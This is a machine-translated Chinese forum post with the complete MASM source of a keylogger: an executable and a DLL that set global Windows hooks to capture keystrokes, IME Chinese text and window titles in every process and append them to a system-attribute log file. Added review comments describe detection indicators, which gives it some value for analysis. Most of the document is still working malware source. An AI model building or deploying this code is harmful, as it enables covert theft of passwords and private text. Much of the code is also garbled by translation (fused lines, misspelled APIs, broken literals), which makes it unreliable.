Keyboard record support Chinese, 3389 (CZY original)

xiaoxiao2021-03-06  50

Keyboard logger with support for Chinese (IME) input and 3389 remote sessions (original)

CZY 04.11.28

It installs two Windows hooks: WH_CALLWNDPROC (watching WM_IME_COMPOSITION) and WH_GETMESSAGE (watching WM_CHAR and WM_KEYUP). The former records Chinese text produced by the input method; the latter records special keys, letters and symbols.

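Chinese input was tested with the "best five" (presumably a Wubi input method) and Smart ABC input methods. The systems tested were Windows 2000, XP and 2003, including a Windows 2000 Server session over 3389 (Terminal Services). (Input typed in cmd is not recorded successfully.)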

The log file is written to C:/Keylog2.txt. To keep people from using this to do harm, the debug window has deliberately not been removed.

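Usage: after a.exe is run, Key.dll is loaded into each process and records the keyboard input there. This is how a system-wide hook behaves: the DLL that holds the hook procedure is mapped into every process on the desktop that receives the hooked messages, so the same non-system DLL appearing in many unrelated GUI processes is the visible sign of it.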

Build parameters (the spacing and letter case below were altered by machine translation and are not literal):

ML / C / Coff A.ASM

RC hook.rc

Link / Subsystem: Windows A.obj hook.res

ML / C / Coff key.asm

Link /SECTION: C: / Masm32 / bin key.Obj / libsystem: windows / libsystem: windows / libpath: c: / masm32 / bin key.obj

RC file

------------------ Hook.rc -----------------

/>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>

#include

/>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>

#define ICO_MAIN 1000

#define DLG_MAIN 1000

#define IDC_Text 1001

/>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>

ICO_MAIN ICON "main.ico"

/>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>> DLG_MAIN DIALOG 208, 130, 234, 167

STYLE DS_MODALFRAME | WS_POPUP | WS_VISIBLE | WS_CAPTION | WS_SYSMENU

CAPTION "Keyboard Hook"

Font 9, "Song"

{

EditText IDC_Text, 5, 5, 224, 158, ES_MULTILINE | ES_AUTOVSCROLL

| WS_BORDER | WS_VSCROLL | WS_TABSTOP | ES_READOONLY

}

/>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>

------------------- End ---------------------

Include file: key.inc

------------ Key.inc -------------

Uninstallhook Proto

Installhook Proto, INSTALLHOOK PROTO

------------ End -----------------

DEF file Key.def

------------ KEY.DEF --------------

Library Key.dll

Exports Installhook, EXPORTS INSTALHOOK

Uninstallhook

--------------- End ----------------

-------------------- A.EXE -------------------------- -

.386

.Model flat, stdcall

Option CaseMAP: NONE

; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>

Include file definition

; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>> include ../include/user32.inc

Includelib ../lib/user32.lib

Include ../include/kernel32.inc

Includelib ../lib/kernel32.lib

Include ../include/windows.inc

INCLUDE Key.inc

IncludeLib key.lib

; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>

; Equorical definition

; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>

ICO_MAIN EQU 1000

DLG_MAIN EQU 1000

IDC_Text EQU 1001

; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>

Data segment

; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>

.DATA?

; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>

; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>

.code

; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>

; -----------------------------------------------------------------------
; _Procdlgmain -- dialog procedure for DLG_MAIN, the visible window whose
; caption is "Keyboard Hook" in hook.rc.
;
; In:   HWND, WMSG, WPARAM, LPARAM (standard dialog-procedure arguments)
; Out:  EAX = True for the two messages handled here, False otherwise
;
; WM_INITDIALOG -> Installhook   (exported by key.dll, see Key.def)
; WM_CLOSE      -> Uninstallhook, then EndDialog
;
; The hooks therefore exist only while this dialog is open. The window is
; the on-screen artifact the author's note says was deliberately left in.
;
; NOTE(review): this listing went through machine translation; identifier
; case and some tokens (e.g. ".lse", the repeated "INVOKE INSTALLHOOK") are
; not the author's original text.
; -----------------------------------------------------------------------
_Procdlgmain Proc Uses EBX EDI ESI HWND, WMSG, WPARAM, LPARAM

MOV EAX, WMSG

*********************************************************** *******************

; Dialog is closing: remove both hooks before the window goes away.
.IF EAX == WM_Close

INVOKE Uninstallhook

Invoke EndDialog, Hwnd, Null

*********************************************************** *******************

; Dialog is being created: this is the only place the hooks get installed.
.ELSEIF EAX == WM_INITDIALOG

Invoke Installhook, INVOKE INSTALLHOOK

*********************************************************** *******************

; Any other message is reported as not handled.
.lse

Mov Eax, False

RET

.endif

Mov Eax, True

RET

_PrOCDLGMain ENDP

; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>

; Program entry point of a.exe. It only shows the modal DLG_MAIN dialog with
; _Procdlgmain as its procedure and exits when the dialog ends; all hook
; installation and removal happens inside that dialog procedure.
; NOTE(review): "NULLINVOKE EXITPROCESS" below is two source lines fused by
; the page extraction (the DialogBoxParam call and a separate ExitProcess call).
Start:

Invoke getModuleHandle, NULL

Invoke Dialogboxparam, EAX, DLG_MAIN, NULL, OFFSET _PROCDLGMAIN, NULLINVOKE EXITPROCESS, NULL

; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>

End Start

-------------------------------------------------------------------------------------------- -

--------------------- Key.dll --------------------------------------------------------------------------------------------------------------------------------------------------------------------------

.386

.Model flat, stdcall

Option CaseMAP: NONE

INCLUDE /MASM32/INCLUDE/Windows.inc

INCLUDE /MASM32/INCLUDE/USER32.INC

INCLUDE /MASM32/INCLUDE/kernel32.inc

INCLUDELIB /MASM32/LIB/USER32.LIB

INCLUDELIB /MASM32/LIB/kernel32.lib

Includelib ../lib/imm32.lib

INCLUDE ../include/imm32.inc

IDC_Text EQU 1001

; Static data of key.dll. The fixed strings in this section (dialog title,
; log path, bracketed key labels, header template) are embedded in the built
; DLL and are usable as static-analysis / host indicators for this sample.
.DATA

; Module handle of key.dll, stored by DLlentry and passed as the hook module
; in Installhook.
Hinstance DD 0

; Title of the a.exe dialog; _Keylog looks the window up by this string.
Maintitle DB 'Keyboard Hook', 0

; Fixed log path handed to the file-open call in _Keylog. The accompanying
; text gives it as C:/Keylog2.txt; the space after the colon is presumably a
; translation artifact.
LogkeyFile2 DB 'C: /keylog2.txt' ,0

; Template for the header line written when the active window changes
; (CR LF, title, CR LF). '% s' is presumably '%s' before translation.
Keylogformat DB 0DH, 0AH, '- ==% s == -', 0DH, 0AH, 0

; ------ VK -------------
; Labels written to the log for non-printing keys (used by HookProc2).

INSERT DB '[INSERT]', 0

Delete DB '[DEL]', 0

Home DB '[Home]', 0

Kend db '[end]', 0

PgDown DB '[PGDN]', 0

PGUP DB '[PGUP]', 0

Down DB '[↓]', 0

Up db '[↑]', 0

LEFT DB '[←]', 0

Right db '[→]', 0

Back db '[<=]', 0

Ctrl db '[ctrl]', 0

Tab DB '[Tab]', 0

Alt db '[alt]', 0; keyboard code is VK_MENU

Shift db '[shift]', 0

Kesc DB '[ESC]', 0

; NOTE(review): the string literal on the next line lost its closing quote
; in extraction; left exactly as the page shows it.
Space db ', 0

PrintScreen DB '[PRTSC]', 0

Capslock DB '[Caps Lock]', 0

Kreturn DB 0DH, 0AH, 0

; Uninitialised data: window/IME handles, the two hook handles, and the
; working buffers.
.DATA?

FORCUSHWND DD?

FHWND DD?

HHOOK DD?

HHOOK2 DD?

; Two 20-byte buffers: the current captured string and the previous one
; (HookProc compares them). The page fused two declarations onto one line.
Cchar DB 20 DUP (?) CChar2 DB 20 DUP (?)

Keylogbuffer DB 1024 DUP (?); Defines 1KB keyboard recording buffer

HLOGKEYFILE DD?

; Last active window seen by _Keylog; a change triggers a new title header.
HACTIVEWINDOW DD?

SVTITLE DB 256 DUP (?); current window title

; Holds the formatted title header (title wrapped in Keylogformat).
SZKEYLOGTITLEBUFFER DB 270 DUP (?)

.code

; -----------------------------------------------------------------------
; DLlentry -- entry point of key.dll (named on the final "End" line).
;
; In:   Hinstdll = module handle, Reason, RESERVED1
; Out:  EAX = True (always)
;
; Stores the module handle in Hinstance; Installhook later passes that value
; as the hook-module argument of both hook-installation calls.
;
; NOTE(review): the condition ".IF real_process_attach" is garbled; it
; presumably tested Reason against DLL_PROCESS_ATTACH -- confirm against an
; untranslated copy.
; -----------------------------------------------------------------------
DLlentry Proc Hinstdll: Hinstance, Reason: DWORD, RESERVED1: DWORD

.IF real_process_attach; DLL is loaded

Push Hinstdll

POP Hinstance

.endif

Mov Eax, True

RET

DLLLENTRY ENDP

; -----------------------------------------------------------------------
; _Keylog -- append one captured string to the display window and to the
; in-memory buffer, flushing the buffer to the log file when it has grown.
;
; In:   Keyaddr = address of a NUL-terminated string (a key label or the
;       contents of Cchar)
; Out:  nothing meaningful in EAX
;
; It is called from HookProc and HookProc2, so it runs inside whichever
; process the hook DLL is currently loaded in.
;
; Observable behaviour, useful for detection and triage:
;   * looks up a top-level window by the fixed title in Maintitle and sends
;     the text to its IDC_Text edit control;
;   * reads the active window's title whenever the active window changes and
;     writes it to the log as a header line;
;   * opens the fixed path in LogkeyFile2 for writing with OPEN_ALWAYS and
;     FILE_ATTRIBUTE_SYSTEM, appends, and closes it on every flush. Writes
;     to that one path from many unrelated processes are the file-system
;     trace of this sample; files with the System attribute are left out of
;     default directory listings.
;
; NOTE(review): identifier spellings (EM_REPLAASEL, setndoffile,
; RTLZERMEMORY, "! =", ".lse", the "/" line continuation) are translation
; damage, not original source.
; -----------------------------------------------------------------------
_Keylog Proc Keyaddr: DWORD

; Mirror the captured text into the a.exe dialog's edit control.
Invoke Findwindow, Null, Offset Maintitle

Invoke Senddlgitemmessage, EAX, IDC_Text, EM_REPLAASEL, 0, KeyAddr

INVOKE GETACTIVEWINDOW

; Active window changed since the last call: record its title as a header.
.IF EAX! = HactiveWindow

MOV HACTIVEWINDOW, EAX

Invoke GetWindowText, HactiveWindow, Offset Svtitle, 256

Invoke WSPrintf, Offset Szkeylogtitlebuffer, Offset Keylogformat, Offset Svtitle

Invoke Lstrcat, Offset Keylogbuffer, Offset SzkeyLogtitlebuffer

.endif

Invoke Lstrlen, Offset Keylogbuffer

; Below the threshold (10 as printed here) the text is only buffered.
.IF EAX <10

Invoke Lstrcat, Offset Keylogbuffer, KeyAddr

.lse

; Otherwise flush: open or create the log, seek to its end, write, close.
Invoke Createfile, Offset LogkeyFile2, Generic_Write, File_Share_Read, /

NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_SYSTEM, NULL

Mov Hlogkeyfile, EAX

Invoke setFilePointer, HLogkeyFile, 0, NULL, FILE_END

Invoke setndoffile, hlogkeyfile; file pointer is placed in the file

Invoke Lstrlen, Offset Keylogbuffer

Invoke _LWRITE, HLOGKEYFILE, OFFSET Keylogbuffer, EAX

Invoke Closehandle, HLogkeyFile

; Clear the 1024-byte buffer and start it again with the current string.
Invoke RTLZERMEMORY, OFFSET Keylogbuffer, 1024

Invoke Lstrcat, Offset Keylogbuffer, KeyAddr

.endif

RET

_Keylog endp

; -----------------------------------------------------------------------
; HookProc -- hook procedure registered by Installhook for WH_CallWndProc.
;
; In:   _dwcode, _wparam, _lparam (hook-procedure arguments; _lparam is
;       treated as a pointer to a CWPStruct)
; Out:  EAX = 0 (the value returned by the next-hook call is discarded)
;
; The next hook in the chain is called first. Then, for HC_ACTION
; notifications carrying the IME composition message, the procedure takes
; the focus window's input context, reads the composition result string
; into Cchar, and hands it to _Keylog unless it equals the previous string
; kept in CChar2.
;
; Observable behaviour: IME context and composition-string calls made from
; inside arbitrary GUI processes by a non-system DLL, plus the message boxes
; below, which put captured text on screen.
;
; NOTE(review): spellings such as Pushhad, WM_IME_COMPSITION,
; ImmgetCompationstring, GCS_RESULTSTSTSTR and ImmreeseContext are
; translation damage. The first message-box call sits among commented-out
; lines and may have lost its comment marker in extraction -- cannot tell
; from this page.
; -----------------------------------------------------------------------
HookProc Proc_dwcode, _wparam, _lparam

Invoke callnexthookex, hhook, _dwcode, _wparam, _lparam

; Save all general registers around the logging work.
Pushhad

.IF _DWCODE == HC_Action

Mov EBX, _LPARAM

Assume EBX: PTR CWPStruct

; Disabled alternative that handled WM_IME_CHAR instead:
; .if [ebx] .Message == WM_IME_CHAR

; MOV DX, Word PTR [EBX] .wparam; xchg DL, DH

; MOV EBX, Offset Cchar

; MOV Word PTR [EBX], DX

Invoke Messageboxa, 0, Addr Cchar, Addr Cchar, 1

; invoke _keylog, addr cchar

.IF [ebx] .Message == WM_IME_COMPSITION

Invoke getfocus

Mov forcushwnd, EAX

Invoke ImmgetContext, ForcushWnd

Mov fHWND, EAX

; First call with a NULL buffer and length 0; its return value, plus the
; size of one wide character, is used as the length for the second call.
Invoke ImmgetCompationstring, FHWND, GCS_RESULTSTSTSTR, NULL, 0

Add Eax, Sizeof Wchar

Invoke ImmgetCompationstring, FHWND, GCS_RESULTSTSTR, OFFSET CCHAR, EAX

; Debug popup showing the captured string.
Invoke Messageboxa, 0, Offset Cchar, Offset Cchar, 1

; Log only when the string differs from the previous one.
Invoke lstrcmp, addr cchar, addr cchar2

.if EAX

Invoke _keylog, addr cchar

.endif

; Remember this string for the next comparison, then clear the work buffer.
Invoke lstrcpy, addr cchar2, addr cchar

Invoke RTLZERMEMORY, OFFSET CCHAR, 20

Invoke ImmreeseContext, ForcushWnd, FHWND

.endif

Assume EBX: Nothing

.endif

Popad

XOR EAX, EAX

RET

HookProc ENDP

; -----------------------------------------------------------------------
; HookProc2 -- hook procedure registered by Installhook for Wh_getMessage.
;
; In:   _dwcode, _wparam, _lparam (hook-procedure arguments; _lparam is
;       treated as a pointer to a MSG)
; Out:  EAX = 0 (the value returned by the next-hook call is discarded)
;
; The next hook is called first. For HC_ACTION notifications:
;   * WM_KEYUP with a virtual-key code below 30h: the key is mapped to one
;     of the bracketed labels in the data section and passed to _Keylog.
;     The space, return and control branches have their logging call
;     commented out and only jump to the exit label.
;   * WM_CHAR whose character is not a DBCS lead byte: backspace, return
;     and space are logged as labels; any other character is stored in
;     Cchar, shown in a debug message box, and passed to _Keylog.
;
; Observable behaviour: every posted keyboard message in a hooked process
; passes through this routine, and the message box appears once per logged
; character.
;
; NOTE(review): this block carries translation and extraction damage --
; Pushhad, "@@ EX" with a space, "addr pggdown", "addr deletejmp @@ EX"
; (two lines fused), "addr leaves" (the LEFT label translated as a word),
; ".lse", and the stray line "_wparam & pm_remove", which presumably
; belonged to the preceding condition. Nothing below is altered.
; -----------------------------------------------------------------------
HookProc2 proc_dwcode, _wparam, _lparam

Invoke callnexthookex, hhook, _dwcode, _wparam, _lparam

Pushhad

.IF _DWCODE == HC_Action

Mov EBX, _LPARAM

Assume EBX: PTR MSG

; --- Key released: handle the non-character keys -----------------------
.IF [ebx] .Message == WM_KEYUP

Mov Edx, [EBX] .wparam

; Only virtual-key codes below 30h are examined in this branch.
.IF DL <30h

.IF DL == VK_SPACE

; Invoke _keylog, Addr space

JMP @@ EX

.ELSEIF DL == VK_RETURN

; Invoke _keylog, addr kreturn

JMP @@ EX

.ELSEIF DL == VK_PGDN; DOWN

Invoke _keylog, addr pggdown

JMP @@ EX

.ELSEIF DL == VK_PGUP; UP

Invoke _keylog, Addr PGUP

JMP @@ EX

.ELSEIF DL == VK_Capital

Invoke _keylog, Addr Capslock

JMP @@ EX

.ELSEIF DL == VK_HOME

Invoke _keylog, addr home

JMP @@ EX

.ELSEIF DL == VK_END

Invoke _keylog, addr kend

JMP @@ EX

.ELSEIF DL == VK_DELETE

Invoke _keylog, addr deletejmp @@ EX

.elseif dl == vk_insert

Invoke _keylog, addr insert

JMP @@ EX

.ELSEIF DL == VK_DOWN

Invoke _keylog, Addr Down

JMP @@ EX

.ELSEIF DL == VK_UP

Invoke _keylog, Addr Up

JMP @@ EX

.ELSEIF DL == VK_LEFT

Invoke _keylog, addr leaves

JMP @@ EX

.ELSEIF DL == VK_Right

Invoke _keylog, Addr Right

JMP @@ EX

.ELSEIF DL == VK_Control

; Invoke _keylog, Addr Ctrl

JMP @@ EX

.ELSEIF DL == VK_TAB

Invoke _keylog, Addr Tab

JMP @@ EX

.ELSEIF DL == VK_ESCAPE

Invoke _keylog, Addr Kesc

JMP @@ EX

.elseif dl == vk_snapshot

Invoke _keylog, Addr Printscreen

JMP @@ EX

.ELSEIF DL == VK_MENU

Invoke _keylog, Addr Alt

JMP @@ EX

.endif

.endif

; --- Translated character ------------------------------------------------
.ELSEIF [EBX] .Message == WM_CHAR

; DBCS lead bytes are skipped here; Chinese text is captured by HookProc
; through the IME composition message instead.
Invoke isdbcsleadbyte, [EBX] .wparam

.IF! EAX

_wparam & pm_remove

MOV DX, Word PTR [EBX] .wparam

.IF DL == VK_BACK

Invoke _keylog, Addr Back

.ELSEIF DL == VK_RETURN

Invoke _keylog, addr kreturn

.ELSEIF DL == VK_SPACE

Invoke _keylog, Addr Space

.lse

; Ordinary character: place it in Cchar, show the debug popup, log it.
Mov EBX, Offset Cchar

MOV Word PTR [EBX], DX

Invoke Messageboxa, 0, Addr Cchar, Addr Cchar, 1

Invoke _keylog, addr cchar

.endif

.endif

.endif

.endif

; Common exit for the WM_KEYUP branches above.
@@ EX:

Assume EBX: Nothing

.endif

Popad

XOR EAX, EAX

RET

HookProc2 Endp

; -----------------------------------------------------------------------
; Installhook -- exported from key.dll (Key.def); called by a.exe when its
; dialog is created.
;
; In:   none
; Out:  EAX = handle returned by the second hook-installation call
;
; Registers two hooks, both with key.dll's module handle (Hinstance) and a
; NULL thread id:
;   WH_CallWndProc -> HookProc,  handle stored in hHOOK2
;   Wh_getMessage  -> HookProc2, handle stored in Hhook
; A NULL (0) thread id asks Windows to apply the hook to all threads on the
; calling desktop, which is what causes key.dll to be loaded into other
; processes, as the usage note for this listing states.
;
; Detection: hook registration of these two types with thread id 0 by a
; small dialog-only program, followed by loads of the same non-system DLL
; in unrelated GUI processes, is the behavioural signature of this sample.
;
; NOTE(review): "SetWindowshookex" is the page's rendering of the API name.
; -----------------------------------------------------------------------
Installhook Proc

Invoke SetWindowshookex, WH_CallWndProc, Addr HookProc, Hinstance, NULL

Mov hHOOK2, EAX

Invoke SetWindowshookex, Wh_getMessage, Addr HookProc2, Hinstance, Null

Mov Hhook, EAX

RET

INSTALLHOOK ENDP

; -----------------------------------------------------------------------
; Uninstallhook -- exported from key.dll (Key.def); called by a.exe when its
; dialog receives the close message.
;
; In:   none
; Out:  EAX = result of the last unhook call
;
; Removes both hooks using the handles saved by Installhook. No other
; caller is visible in this listing, so as shown the hooks are removed only
; when the dialog is closed through that message.
;
; NOTE(review): "HHOOK2RET" is the second handle name fused with the
; following RET line by the page extraction.
; -----------------------------------------------------------------------
Uninstallhook Proc

Invoke UnHookWindowshookex, HHOOK

Invoke UnHookWindowshookex, HHOOK2RET

Uninstallhook endp

End dllenTry

----------------------------------------------- End-- -------------------------
